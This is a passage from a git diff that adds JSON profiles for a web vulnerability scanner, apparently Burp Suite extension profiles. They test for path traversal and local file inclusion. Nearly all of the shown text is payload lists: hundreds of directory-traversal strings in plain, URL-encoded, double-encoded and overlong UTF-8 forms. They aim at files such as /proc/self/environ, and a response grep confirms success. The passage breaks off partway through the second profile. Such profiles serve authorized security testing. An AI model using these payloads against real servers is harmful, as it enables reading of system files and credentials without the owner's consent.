+ "true,.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\..\\..\\{FILE}",
+ "true,.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\..\\..\\..\\{FILE}",
+ "true,.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\..\\..\\..\\..\\{FILE}",
+ "true,.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\..\\..\\..\\..\\..\\{FILE}",
+ "true,./../{FILE}",
+ "true,./.././../{FILE}",
+ "true,./.././.././../{FILE}",
+ "true,./.././.././.././../{FILE}",
+ "true,./.././.././.././.././../{FILE}",
+ "true,./.././.././.././.././.././../{FILE}",
+ "true,./.././.././.././.././.././.././../{FILE}",
+ "true,./.././.././.././.././.././.././.././../{FILE}",
+ "true,.\\..\\{FILE}",
+ "true,.\\..\\.\\..\\{FILE}",
+ "true,.\\..\\.\\..\\.\\..\\{FILE}",
+ "true,.\\..\\.\\..\\.\\..\\.\\..\\{FILE}",
+ "true,.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}",
+ "true,.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}",
+ "true,.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}",
+ "true,.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}",
+ "true,.//..//{FILE}",
+ "true,.//..//.//..//{FILE}",
+ "true,.//..//.//..//.//..//{FILE}",
+ "true,.//..//.//..//.//..//.//..//{FILE}",
+ "true,.//..//.//..//.//..//.//..//.//..//{FILE}",
+ "true,.//..//.//..//.//..//.//..//.//..//.//..//{FILE}",
+ "true,.//..//.//..//.//..//.//..//.//..//.//..//.//..//{FILE}",
+ "true,.//..//.//..//.//..//.//..//.//..//.//..//.//..//.//..//{FILE}",
+ "true,.\\\\..\\\\{FILE}",
+ "true,.\\\\..\\\\.\\\\..\\\\{FILE}",
+ "true,.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}",
+ "true,.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}",
+ "true,.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}",
+ "true,.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}",
+ "true,.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}",
+ "true,.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}",
+ "true,../{FILE}",
+ "true,../..//{FILE}",
+ "true,../..//../{FILE}",
+ "true,../..//../..//{FILE}",
+ "true,../..//../..//../{FILE}",
+ "true,../..//../..//../..//{FILE}",
+ "true,../..//../..//../..//../{FILE}",
+ "true,../..//../..//../..//../..//{FILE}",
+ "true,..\\{FILE}",
+ "true,..\\..\\\\{FILE}",
+ "true,..\\..\\\\..\\{FILE}",
+ "true,..\\..\\\\..\\..\\\\{FILE}",
+ "true,..\\..\\\\..\\..\\\\..\\{FILE}",
+ "true,..\\..\\\\..\\..\\\\..\\..\\\\{FILE}",
+ "true,..\\..\\\\..\\..\\\\..\\..\\\\..\\{FILE}",
+ "true,..\\..\\\\..\\..\\\\..\\..\\\\..\\..\\\\{FILE}",
+ "true,..///{FILE}",
+ "true,../..///{FILE}",
+ "true,../..//..///{FILE}",
+ "true,../..//../..///{FILE}",
+ "true,../..//../..//..///{FILE}",
+ "true,../..//../..//../..///{FILE}",
+ "true,../..//../..//../..//..///{FILE}",
+ "true,../..//../..//../..//../..///{FILE}",
+ "true,..\\\\\\{FILE}",
+ "true,..\\..\\\\\\{FILE}",
+ "true,..\\..\\\\..\\\\\\{FILE}",
+ "true,..\\..\\\\..\\..\\\\\\{FILE}",
+ "true,..\\..\\\\..\\..\\\\..\\\\\\{FILE}",
+ "true,..\\..\\\\..\\..\\\\..\\..\\\\\\{FILE}",
+ "true,..\\..\\\\..\\..\\\\..\\..\\\\..\\\\\\{FILE}",
+ "true,..\\..\\\\..\\..\\\\..\\..\\\\..\\..\\\\\\{FILE}"
+ ],
+ "Encoder": [],
+ "UrlEncode": false,
+ "CharsToUrlEncode": "",
+ "Grep": [
+ "true,,HTTP_USER_AGENT"
+ ],
+ "Tags": [
+ "All"
+ ],
+ "PayloadResponse": false,
+ "NotResponse": false,
+ "TimeOut1": "",
+ "TimeOut2": "",
+ "isTime": false,
+ "contentLength": "",
+ "iscontentLength": false,
+ "CaseSensitive": false,
+ "ExcludeHTTP": false,
+ "OnlyHTTP": false,
+ "IsContentType": false,
+ "ContentType": "",
+ "HttpResponseCode": "",
+ "NegativeCT": false,
+ "IsResponseCode": false,
+ "ResponseCode": "",
+ "NegativeRC": false,
+ "urlextension": "",
+ "isurlextension": false,
+ "NegativeUrlExtension": false,
+ "MatchType": 1,
+ "Scope": 0,
+ "RedirType": 0,
+ "MaxRedir": 0,
+ "payloadPosition": 1,
+ "payloadsFile": "",
+ "grepsFile": "",
+ "IssueName": "Linux-self-environ",
+ "IssueSeverity": "Medium",
+ "IssueConfidence": "Certain",
+ "IssueDetail": "Linux-self-environ",
+ "RemediationDetail": "",
+ "IssueBackground": "Linux-self-environ",
+ "RemediationBackground": "",
+ "Header": [
+ {
+ "type": "Payload",
+ "match": "{FILE}",
+ "replace": "proc/self/environ",
+ "regex": "String"
+ }
+ ],
+ "VariationAttributes": [],
+ "InsertionPointType": [
+ 18,
+ 65,
+ 32,
+ 36,
+ 7,
+ 1,
+ 2,
+ 6,
+ 33,
+ 5,
+ 35,
+ 34,
+ 64,
+ 0,
+ 3,
+ 4,
+ 37,
+ 127,
+ 65,
+ 32,
+ 36,
+ 7,
+ 1,
+ 2,
+ 6,
+ 33,
+ 5,
+ 35,
+ 34,
+ 64,
+ 0,
+ 3,
+ 4,
+ 37,
+ 127
+ ],
+ "Scanas": false,
+ "Scantype": 0,
+ "pathDiscovery": false
+ }
+]
\ No newline at end of file
diff --git a/profiles/Linux-source-list.bb b/profiles/Linux-source-list.bb
index 112af7f..891dda6 100755
--- a/profiles/Linux-source-list.bb
+++ b/profiles/Linux-source-list.bb
@@ -1 +1,950 @@
-[{"Name":"Linux-source-list","Enabled":true,"Scanner":1,"Author":"@Sy3Omda","Payloads":["../{FILE}","../../{FILE}","../../../{FILE}","../../../../{FILE}","../../../../../{FILE}","../../../../../../{FILE}","../../../../../../../{FILE}","../../../../../../../../{FILE}","..%2f{FILE}","..%2f..%2f{FILE}","..%2f..%2f..%2f{FILE}","..%2f..%2f..%2f..%2f{FILE}","..%2f..%2f..%2f..%2f..%2f{FILE}","..%2f..%2f..%2f..%2f..%2f..%2f{FILE}","..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}","..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}","%2e%2e/{FILE}","%2e%2e/%2e%2e/{FILE}","%2e%2e/%2e%2e/%2e%2e/{FILE}","%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}","%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}","%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}","%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}","%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}","%2e%2e%2f{FILE}","%2e%2e%2f%2e%2e%2f{FILE}","%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","..%252f{FILE}","..%252f..%252f{FILE}","..%252f..%252f..%252f{FILE}","..%252f..%252f..%252f..%252f{FILE}","..%252f..%252f..%252f..%252f..%252f{FILE}","..%252f..%252f..%252f..%252f..%252f..%252f{FILE}","..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}","..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}","%252e%252e/{FILE}","%252e%252e/%252e%252e/{FILE}","%252e%252e/%252e%252e/%252e%252e/{FILE}","%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}","%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}","%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}","%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}","%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}","%252e%252e%252f{FILE}","%252e%252e%252f%252e%252e%252f{FILE}","%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}","%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}","%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}","%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}","%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}","%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}","..\\{FILE}","..\\..\\{FILE}","..\\..\\..\\{FILE}","..\\..\\..\\..\\{FILE}","..\\..\\..\\..\\..\\{FILE}","..\\..\\..\\..\\..\\..\\{FILE}","..\\..\\..\\..\\..\\..\\..\\{FILE}","..\\..\\..\\..\\..\\..\\..\\..\\{FILE}","..%255c{FILE}","..%255c..%255c{FILE}","..%255c..%255c..%255c{FILE}","..%255c..%255c..%255c..%255c{FILE}","..%255c..%255c..%255c..%255c..%255c{FILE}","..%255c..%255c..%255c..%255c..%255c..%255c{FILE}","..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}","..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}","..%5c..%5c{FILE}","..%5c..%5c..%5c{FILE}","..%5c..%5c..%5c..%5c{FILE}","..%5c..%5c..%5c..%5c..%5c{FILE}","..%5c..%5c..%5c..%5c..%5c..%5c{FILE}","..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}","..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}","%2e%2e\\{FILE}","%2e%2e\\%2e%2e\\{FILE}","%2e%2e\\%2e%2e\\%2e%2e\\{FILE}","%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}","%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}","%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}","%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}","%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}","%2e%2e%5c{FILE}","%2e%2e%5c%2e%2e%5c{FILE}","%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","%252e%252e\\{FILE}","%252e%252e\\%252e%252e\\{FILE}","%252e%252e\\%252e%252e\\%252e%252e\\{FILE}","%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}","%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}","%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}","%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}","%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}","%252e%252e%255c{FILE}","%252e%252e%255c%252e%252e%255c{FILE}","%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}","%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}","%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}","%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}","%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}","%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}","..%c0%af{FILE}","..%c0%af..%c0%af{FILE}","..%c0%af..%c0%af..%c0%af{FILE}","..%c0%af..%c0%af..%c0%af..%c0%af{FILE}","..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}","..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}","..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}","..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}","%c0%ae%c0%ae/{FILE}","%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}","%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}","%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}","%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}","%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}","%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}","%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}","%c0%ae%c0%ae%c0%af{FILE}","%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}","%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}","%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}","%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}","%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}","%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}","%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}","..%25c0%25af{FILE}","..%25c0%25af..%25c0%25af{FILE}","..%25c0%25af..%25c0%25af..%25c0%25af{FILE}","..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}","..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}","..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}","..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}","..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}","%25c0%25ae%25c0%25ae/{FILE}","%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}","%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}","%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}","%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}","%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}","%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}","%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}","%25c0%25ae%25c0%25ae%25c0%25af{FILE}","%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}","%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}","%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}","%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}","%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}","%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}","%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}","..%c1%9c{FILE}","..%c1%9c..%c1%9c{FILE}","..%c1%9c..%c1%9c..%c1%9c{FILE}","..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}","..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}","..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}","..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}","..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}","%c0%ae%c0%ae\\{FILE}","%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}","%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}","%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}","%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}","%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}","%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}","%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}","%c0%ae%c0%ae%c1%9c{FILE}","%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}","%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}","%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}","%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}","%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}","%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}","%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}","..%25c1%259c{FILE}","..%25c1%259c..%25c1%259c{FILE}","..%25c1%259c..%25c1%259c..%25c1%259c{FILE}","..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}","..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}","..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}","..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}","..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}","%25c0%25ae%25c0%25ae\\{FILE}","%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}","%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}","%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}","%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}","%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}","%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}","%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}","%25c0%25ae%25c0%25ae%25c1%259c{FILE}","%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}","%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}","%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}","%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0